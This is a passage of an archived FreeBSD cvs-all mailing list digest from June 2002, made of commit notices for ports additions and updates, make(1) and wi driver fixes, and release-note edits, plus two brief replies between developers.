"unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9:36: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 11CF437B403; Wed, 19 Jun 2002 09:36:02 -0700 (PDT) Received: (from skv@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JGa2B40819; Wed, 19 Jun 2002 09:36:02 -0700 (PDT) (envelope-from skv) Message-Id: <200206191636.g5JGa2B40819@freefall.freebsd.org> From: Sergey Skvortsov Date: Wed, 19 Jun 2002 09:36:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel Makefile ports/devel/p5-Devel-ptkdb Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG skv 2002/06/19 09:36:01 PDT Modified files: devel Makefile Added files: devel/p5-Devel-ptkdb Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Add p5-Devel-ptkdb 1.1074, tk debugger for Perl. PR: 37880 Submitted by: Alex Kapranoff Revision Changes Path 1.850 +1 -0 ports/devel/Makefile 1.1 +28 -0 ports/devel/p5-Devel-ptkdb/Makefile (new) 1.1 +1 -0 ports/devel/p5-Devel-ptkdb/distinfo (new) 1.1 +1 -0 ports/devel/p5-Devel-ptkdb/pkg-comment (new) 1.1 +17 -0 ports/devel/p5-Devel-ptkdb/pkg-descr (new) 1.1 +5 -0 ports/devel/p5-Devel-ptkdb/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9:36:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F1DC437B411; Wed, 19 Jun 2002 09:36:12 -0700 (PDT) Received: (from skv@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JGaCi40854; Wed, 19 Jun 2002 09:36:12 -0700 (PDT) (envelope-from skv) Message-Id: <200206191636.g5JGaCi40854@freefall.freebsd.org> From: Sergey Skvortsov Date: Wed, 19 Jun 2002 09:36:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG skv 2002/06/19 09:36:12 PDT Modified files: . modules Log: p5-Devel-ptkdb --> ports/devel/p5-Devel-ptkdb Revision Changes Path 1.5387 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9:38: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BDF4237B408; Wed, 19 Jun 2002 09:37:57 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JGbvX41372; Wed, 19 Jun 2002 09:37:57 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191637.g5JGbvX41372@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 09:37:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/snd Makefile ports/cad/geda Makefile ports/cad/gnetlist Makefile ports/cad/gschem Makefile ports/deskutils/gnucash Makefile ports/devel/autogen Makefile ports/devel/g-wrap Makefile ports/devel/libgtop Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 09:37:57 PDT Modified files: audio/snd Makefile cad/geda Makefile cad/gnetlist Makefile cad/gschem Makefile deskutils/gnucash Makefile devel/autogen Makefile devel/g-wrap Makefile devel/libgtop Makefile games/gnomegames Makefile games/gnomegames2 Makefile games/gnurobots Makefile lang/gnustep-guile Makefile mail/icqmail Makefile math/guppi Makefile math/siag Makefile print/lilypond Makefile x11-toolkits/guile-gtk Makefile x11-wm/scwm Makefile Log: Chase guile shared lib number. Prompted by: Mike Harding Revision Changes Path 1.20 +1 -1 ports/audio/snd/Makefile 1.24 +1 -1 ports/cad/geda/Makefile 1.5 +1 -1 ports/cad/gnetlist/Makefile 1.3 +1 -1 ports/cad/gschem/Makefile 1.41 +1 -1 ports/deskutils/gnucash/Makefile 1.17 +1 -1 ports/devel/autogen/Makefile 1.11 +1 -1 ports/devel/g-wrap/Makefile 1.47 +1 -1 ports/devel/libgtop/Makefile 1.42 +1 -1 ports/games/gnomegames/Makefile 1.47 +1 -1 ports/games/gnomegames2/Makefile 1.3 +2 -2 ports/games/gnurobots/Makefile 1.23 +1 -1 ports/lang/gnustep-guile/Makefile 1.8 +1 -1 ports/mail/icqmail/Makefile 1.11 +1 -1 ports/math/guppi/Makefile 1.32 +2 -2 ports/math/siag/Makefile 1.6 +1 -1 ports/print/lilypond/Makefile 1.15 +2 -2 ports/x11-toolkits/guile-gtk/Makefile 1.23 +1 -1 ports/x11-wm/scwm/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9:43:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 36B5437B407; Wed, 19 Jun 2002 09:43:41 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JGhfK42884; Wed, 19 Jun 2002 09:43:41 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191643.g5JGhfK42884@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 09:43:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/gconf Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 09:43:41 PDT Modified files: devel/gconf Makefile Log: Whoops, forgot one. Chase guile shared lib version. Revision Changes Path 1.30 +1 -1 ports/devel/gconf/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9:44:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 036D137B41E; Wed, 19 Jun 2002 09:43:57 -0700 (PDT) Received: (from skv@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JGhu142982; Wed, 19 Jun 2002 09:43:56 -0700 (PDT) (envelope-from skv) Message-Id: <200206191643.g5JGhu142982@freefall.freebsd.org> From: Sergey Skvortsov Date: Wed, 19 Jun 2002 09:43:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel Makefile ports/devel/p5-Date-ISO Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG skv 2002/06/19 09:43:56 PDT Modified files: devel Makefile Added files: devel/p5-Date-ISO Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Add p5-Date-ISO 1.28, converts dates between ISO and Gregorian formats. PR: 38017 Submitted by: Kimura Fuyuki Revision Changes Path 1.851 +1 -0 ports/devel/Makefile 1.1 +26 -0 ports/devel/p5-Date-ISO/Makefile (new) 1.1 +1 -0 ports/devel/p5-Date-ISO/distinfo (new) 1.1 +1 -0 ports/devel/p5-Date-ISO/pkg-comment (new) 1.1 +7 -0 ports/devel/p5-Date-ISO/pkg-descr (new) 1.1 +5 -0 ports/devel/p5-Date-ISO/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 9:44:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1609337B40E; Wed, 19 Jun 2002 09:44:05 -0700 (PDT) Received: (from skv@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JGi5m43059; Wed, 19 Jun 2002 09:44:05 -0700 (PDT) (envelope-from skv) Message-Id: <200206191644.g5JGi5m43059@freefall.freebsd.org> From: Sergey Skvortsov Date: Wed, 19 Jun 2002 09:44:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG skv 2002/06/19 09:44:04 PDT Modified files: . modules Log: p5-Date-ISO --> ports/devel/p5-Date-ISO Revision Changes Path 1.5388 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:10:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D7F5737B42B; Wed, 19 Jun 2002 10:09:23 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JH9Nj49978; Wed, 19 Jun 2002 10:09:23 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191709.g5JH9Nj49978@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 10:09:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/esound Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 10:09:23 PDT Modified files: audio/esound Makefile distinfo Log: Update to 0.2.28. Reminder by: pat Revision Changes Path 1.36 +1 -1 ports/audio/esound/Makefile 1.17 +1 -1 ports/audio/esound/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:17:58 2002 Delivered-To: cvs-all@freebsd.org Received: from green.bikeshed.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C611F37B40A; Wed, 19 Jun 2002 10:17:52 -0700 (PDT) Received: from localhost (green@localhost) by green.bikeshed.org (8.11.6/8.11.6) with ESMTP id g5JHHqW08494; Wed, 19 Jun 2002 13:17:53 -0400 (EDT) (envelope-from green@green.bikeshed.org) Message-Id: <200206191717.g5JHHqW08494@green.bikeshed.org> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: Matt Dillon Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/graphics Makefile ports/graphics/crw Makefile distinfo pkg-comment pkg-descr pkg-plist In-Reply-To: Your message of "Sun, 16 Jun 2002 23:24:23 PDT." <200206170624.g5H6ONE43276@freefall.freebsd.org> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 19 Jun 2002 13:17:52 -0400 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Matt Dillon wrote: > dillon 2002/06/16 23:24:23 PDT > > Modified files: > graphics Makefile > Added files: > graphics/crw Makefile distinfo pkg-comment pkg-descr > pkg-plist > Log: > Initial checking of the 'crw' port. This program converts the RAW Canon > digital camera format into something gimp or ImageMagick can process. > The program was originally written by Dave Coffin , > who gave me permission to make a port out of it. I've made extensive > modifications to the program's algorithms. I can attest to how cool this is -- Matt's done a great job improving upon the raw->RGB conversion algorithms! Now I just have to buy a Canon which _does_ let me choose to save images in raw mode... -- Brian Fundakowski Feldman \'[ FreeBSD ]''''''''''\ <> green@FreeBSD.org <> bfeldman@tislabs.com \ The Power to Serve! \ Opinions expressed are my own. \,,,,,,,,,,,,,,,,,,,,,,\ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:23:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1F6B937B401; Wed, 19 Jun 2002 10:23:09 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JHN9a51591; Wed, 19 Jun 2002 10:23:09 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206191723.g5JHN9a51591@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 10:23:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make var.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 10:23:09 PDT Modified files: usr.bin/make var.c Log: Possibly expand the variable name's embedded variables before using it, as seen (somewhat) in NetBSD. This catches a few extra recursion cases that could be hidden by expanding a NIL variable causing an existing variable to be returned (which caused infinite looping and climbing memory usage in at least one case). Obtained from: NetBSD (in principle) Revision Changes Path 1.27 +26 -0 src/usr.bin/make/var.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:35:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 751FF37B403; Wed, 19 Jun 2002 10:35:17 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JHZHp53008; Wed, 19 Jun 2002 10:35:17 -0700 (PDT) (envelope-from marcus) Message-Id: <200206191735.g5JHZHp53008@freefall.freebsd.org> From: Joe Marcus Clarke Date: Wed, 19 Jun 2002 10:35:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fm/gnome-commander Makefile distinfo pkg-plist ports/x11-fm/gnome-commander/files patch-configure patch-src_gnome-cmd-data.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/19 10:35:17 PDT Modified files: x11-fm/gnome-commander Makefile distinfo pkg-plist x11-fm/gnome-commander/files patch-configure Added files: x11-fm/gnome-commander/files patch-src_gnome-cmd-data.c Log: Update to 0.9.7. PR: 39437 Submitted by: maintainer Revision Changes Path 1.2 +18 -7 ports/x11-fm/gnome-commander/Makefile 1.2 +1 -1 ports/x11-fm/gnome-commander/distinfo 1.2 +3 -3 ports/x11-fm/gnome-commander/files/patch-configure 1.1 +11 -0 ports/x11-fm/gnome-commander/files/patch-src_gnome-cmd-data.c (new) 1.2 +4 -2 ports/x11-fm/gnome-commander/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:37:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C5DDB37B405; Wed, 19 Jun 2002 10:37:34 -0700 (PDT) Received: (from imp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JHbYf53276; Wed, 19 Jun 2002 10:37:34 -0700 (PDT) (envelope-from imp) Message-Id: <200206191737.g5JHbYf53276@freefall.freebsd.org> From: Warner Losh Date: Wed, 19 Jun 2002 10:37:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/wi if_wi.c if_wireg.h if_wivar.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG imp 2002/06/19 10:37:34 PDT Modified files: sys/dev/wi if_wi.c if_wireg.h if_wivar.h Log: Add better mediaopt support for ibss and friends. Now the driver is closer to matching the wi man page. Submitted by: jhay (who obtained it from OpenBSD). Revision Changes Path 1.106 +160 -38 src/sys/dev/wi/if_wi.c 1.32 +1 -1 src/sys/dev/wi/if_wireg.h 1.9 +10 -0 src/sys/dev/wi/if_wivar.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:39:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8238337B40D; Wed, 19 Jun 2002 10:39:36 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JHdaJ53469; Wed, 19 Jun 2002 10:39:36 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206191739.g5JHdaJ53469@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 10:39:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make var.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 10:39:36 PDT Modified files: usr.bin/make var.c Log: Fix a memory leak from previous commit by freeing the possibly expanded string at the first opportunity, being sure to now always allocate the new string from VarPossiblyExpand. Oops. Revision Changes Path 1.28 +8 -2 src/usr.bin/make/var.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:41:42 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id 2E84D37B407; Wed, 19 Jun 2002 10:41:38 -0700 (PDT) Date: Wed, 19 Jun 2002 10:41:38 -0700 From: Juli Mallett To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/make var.c Message-ID: <20020619104138.A65962@FreeBSD.ORG> References: <200206191739.g5JHdaJ53469@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206191739.g5JHdaJ53469@freefall.freebsd.org>; from jmallett@FreeBSD.org on Wed, Jun 19, 2002 at 10:39:36AM -0700 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Juli Mallett escriurères > jmallett 2002/06/19 10:39:36 PDT > > Modified files: > usr.bin/make var.c > Log: > Fix a memory leak from previous commit by freeing the possibly expanded > string at the first opportunity, being sure to now always allocate the > new string from VarPossiblyExpand. Oops. Sorry about this. It's always nice to remember what Side effects are listed for a given function *after* making use of it. uNF. > Revision Changes Path > 1.28 +8 -2 src/usr.bin/make/var.c -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 10:52:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9FC4537B40C; Wed, 19 Jun 2002 10:52:47 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JHqlq55390; Wed, 19 Jun 2002 10:52:47 -0700 (PDT) (envelope-from lioux) Message-Id: <200206191752.g5JHqlq55390@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Wed, 19 Jun 2002 10:52:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/edonkey-core/files README.FreeBSD X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/19 10:52:47 PDT Modified files: net/edonkey-core/files README.FreeBSD Log: Update with current information Revision Changes Path 1.2 +9 -7 ports/net/edonkey-core/files/README.FreeBSD To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 11:57: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 953E537B40A; Wed, 19 Jun 2002 11:57:04 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JIv4G66892; Wed, 19 Jun 2002 11:57:04 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206191857.g5JIv4G66892@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 11:57:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/tools/regression/usr.bin/make Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 11:57:04 PDT Modified files: tools/regression/usr.bin/make Makefile Log: Add a test for what was fixed in revision 1.27 and 1.28 of make(1)'s var.c, expansion of embedded variables in the left-hand-side of an assignment expression, using the simplest case - hiding recursion using nil-expanded variables. Revision Changes Path 1.5 +17 -0 src/tools/regression/usr.bin/make/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 11:57:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E2D4937B403; Wed, 19 Jun 2002 11:57:20 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JIvKK66942; Wed, 19 Jun 2002 11:57:20 -0700 (PDT) (envelope-from bmah) Message-Id: <200206191857.g5JIvKK66942@freefall.freebsd.org> From: "Bruce A. Mah" Date: Wed, 19 Jun 2002 11:57:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/errata article.sgml X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/19 11:57:20 PDT Modified files: (Branch: RELENG_4) release/doc/en_US.ISO8859-1/errata article.sgml Log: Add a new errata note that tries to address some problems seen with some ata(4) CDROM drives. Reviewed by: stable@ Revision Changes Path 1.1.2.69 +76 -1 src/release/doc/en_US.ISO8859-1/errata/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 11:58:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A1A4A37B419; Wed, 19 Jun 2002 11:58:05 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JIw5l67019; Wed, 19 Jun 2002 11:58:05 -0700 (PDT) (envelope-from pat) Message-Id: <200206191858.g5JIw5l67019@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 11:58:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/rsync Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 11:58:05 PDT Modified files: net/rsync Makefile Log: Dont remove .bak files PR: 39535 Submitted by: maintainer Revision Changes Path 1.75 +0 -2 ports/net/rsync/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 11:58:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 144B037B403; Wed, 19 Jun 2002 11:58:17 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JIwHP67090; Wed, 19 Jun 2002 11:58:17 -0700 (PDT) (envelope-from bmah) Message-Id: <200206191858.g5JIwHP67090@freefall.freebsd.org> From: "Bruce A. Mah" Date: Wed, 19 Jun 2002 11:58:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/19 11:58:17 PDT Modified files: (Branch: RELENG_4) release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: New release note: ata(4) tagged queueing bugfix. Revision Changes Path 1.22.2.251 +3 -2 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12: 5:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E2C6737B40D; Wed, 19 Jun 2002 12:05:23 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJ5Nv68994; Wed, 19 Jun 2002 12:05:23 -0700 (PDT) (envelope-from blackend) Message-Id: <200206191905.g5JJ5Nv68994@freefall.freebsd.org> From: Marc Fonvieille Date: Wed, 19 Jun 2002 12:05:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/fr_FR.ISO8859-1/share/sgml freebsd.dsl X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/19 12:05:23 PDT Modified files: fr_FR.ISO8859-1/share/sgml freebsd.dsl Log: Add generation of links to HTML man pages in french docs Approved by: keramida Revision Changes Path 1.6 +8 -0 doc/fr_FR.ISO8859-1/share/sgml/freebsd.dsl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 12: 5:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9EED337B406; Wed, 19 Jun 2002 12:05:41 -0700 (PDT) Received: (from mike@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5JJ5fW69852; Wed, 19 Jun 2002 12:05:41 -0700 (PDT) (envelope-from mike) Message-Id: <200206191905.g5JJ5fW69852@freefall.freebsd.org> From: Mike Barcroft Date: Wed, 19 Jun 2002 12:05:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys un.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG 